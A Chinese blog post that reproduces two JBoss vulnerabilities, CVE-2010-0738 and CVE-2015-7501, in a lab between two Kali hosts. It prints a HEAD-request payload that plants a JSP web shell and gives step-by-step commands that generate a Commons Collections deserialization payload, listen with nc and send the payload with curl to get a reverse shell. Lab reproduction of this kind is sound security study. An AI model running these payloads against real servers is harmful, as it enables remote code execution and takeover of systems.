JBoss漏洞 - CVE-2010-0738 CVE-2015-7501

已于 2023-06-01 16:37:45 修改
阅读量1.9k 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 java web安全 网络 漏洞复现
于 2022-12-13 17:57:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/128305735
版权

文章目录

JMX Console安全验证绕过

CVE-2010-0738

漏洞简介

利用原理与CVE-2007-1036相同,只不过利用HEAD请求方法绕过GET和POST请求的限制

影响版本

jboss4.2.0-jboss4.3.0

漏洞利用

POC

HEAD /jmx-console/HtmlAdaptor?
action=invokeOp&name=jboss.admin:service=DeploymentFileRepository&methodIndex=6&arg0=../jmx-console.war/&arg1=hax0rwin&arg2=.jsp&arg3=<%Runtime.getRuntime().exec(request.getParameter("i"));%>&arg4=True

CVE-2015-7501

JMXInvokerServlet 反序列化漏洞

漏洞简介

CVE-2015-7501, JBoss 在
/invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码

Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化, JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,从而导致了漏洞。

漏洞环境

kali(攻击机):192.168.88.128
kali(靶机):192.168.88.130

漏洞搭建

docker search testjboss

docker pull testjboss/jboss

docker run -p 8085:8080 -d testjboss/jboss

访问 http://192.168.88.130:8085/ 如下搭建成功

漏洞发现

访问 http://ip:port/invoker/JMXInvokerServlet ,返回如下的 response ,说明接口是开放的,
此接口存在漏洞

漏洞利用

进入kali攻击机,下载反序列化工具

下载地址:https://github.com/ianxtianxt/CVE-2015-7501/

下载完成,解压进入工具目录

执行命令

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

继续执行下条命令

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.88.128:9999(IP是攻击机ip,9999是要监听的端口)

新界面开启nc准备接收反弹过来的shell。命令:nc -lvnp 9999

这个时候在这个目录下生成了一个ReverseShellCommonsCollectionsHashMap.ser文件,然后我们curl就能反弹shell了,执行命令:

curl http://192.168.88.130:8085/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

执行完这条命令,返回监听窗口,即可得到shell

渗透测试小白
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JBoos漏洞及利用整理
weixin_45106410的博客
11-30 4277
CVE-2013-4810 Apache Tomcat/Jboss远程代码执行漏洞CVE-2015-7501漏洞原理相同,这里详细介绍一下两者的区别,其区别就在于两个漏洞选择的进行其中JMXInvokerServlet和EJBInvokerServlet利用的是org.jboss.invocation.MarshalledValue进行的反序列化操作,而web-console/Invoker利用的org.jboss.console.remote.RemoteMBeanInvocation进行反序列化并
jboss-autopwn:在 BlackHat Europe 2010 上展示的 JBoss Autopwn - 此版本包含 CVE-2010-0738,即 Minded Security 发现的 JBoss 身份验证绕过 VERB 操作漏洞
06-28
jboss-autopwn 在 BlackHat Europe 2010 上展示的 JBoss Autopwn - 此版本包含 CVE-2010-0738,即 Minded Security 发现的 JBoss 身份验证绕过 VERB 操作漏洞 C. Papathanasiou 2010 介绍 这个 JBoss 脚本在目标 JBoss AS 服务器上部署了一个 JSP shell。 部署后,脚本使用其上传和命令执行功能来提供交互式会话。 功能包括: 多平台支持 - 在 Windows、Linux 和 Mac 目标上测试 支持绑定和反向绑定外壳 Meterpreter shell 和 VNC 支持 Windows 目标 安装 依赖项包括 网猫 卷曲 Metasploit v3,作为“framework3”安装在当前路径 用法 对使用 bind_tcp 和 reverse_tcp 的 *
Exploit/CVE-2010-0738
男神的专栏
06-09 1116
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)
黑白的博客
12-21 2024
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
jboss CVE-2015-7501 反序列化漏洞
读书 买花 长大
06-04 1000
CVE-2015-7501
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
jboss4版本修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)升级包
04-25
jboss4版本下,jbossweb-tomcat55.sar升级包,修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439) 升级包中的jar来源于tomcat5.5.36 使用方法:直接替换jboss中旧的jbossweb-tomcat55.sar
JBOSS 反序列化(CVE-2015-7501)复现
weixin_63124284的博客
10-24 1305
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。
JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现
最新发布
qq_42430287的博客
12-23 1434
如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。
JBoss企业应用平台多个非授权访问漏洞
weixin_34233679的博客
12-01 117
警 告 以下程序(方法)可能带有***性,仅供安全研究与教学之用。使用者风险自负! Chris said... Got this working with JBoss-autopwn :-D Screenshot below.. [root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080 [x]...
【vulhub】JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)复现
qq_45300786的博客
04-15 1177
漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SO
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501和CVE-2017-12149)
来到了学渣的博客
08-29 5058
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell反弹不回来。 步骤: 发现漏洞指纹→反弹shell进行编码→用ysoserial把编码好的反弹shell生ser文件→启动监听→用curl或
JBoss常见漏洞整理
热门推荐
寒星的博客
06-01 1万+
JBoss常见漏洞整理 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 JBoss高危漏洞主要涉及到以下两种。 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036,CVE-2010-0738,CVE-2006.
jboss中间件漏洞总结
看不尽的尘埃——博客
02-09 6248
目录     前言   获取服务器所采用的中间件信息   JBOSS默认配置后台漏洞   弱口令/未授权访问   Jboss蠕虫   JMX控制台安全验证绕过漏洞CVE-2010-0738)   反序列化漏洞   命令执行   拒绝服务   其他漏洞   总结   前言 昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jbo...
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6807
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
jboss CVE-2017-7504 如何修复
11-03
JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。修复该漏洞的方法如下: 1.升级JBoss AS至5.x或以上版本。 2.禁用JMS over HTTP Invocation Layer。 3.限制HTTPServerILServlet的访问权限。 4.使用安全的序列化方式。 5.使用防火墙等安全设备限制对HTTPServerILServlet的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值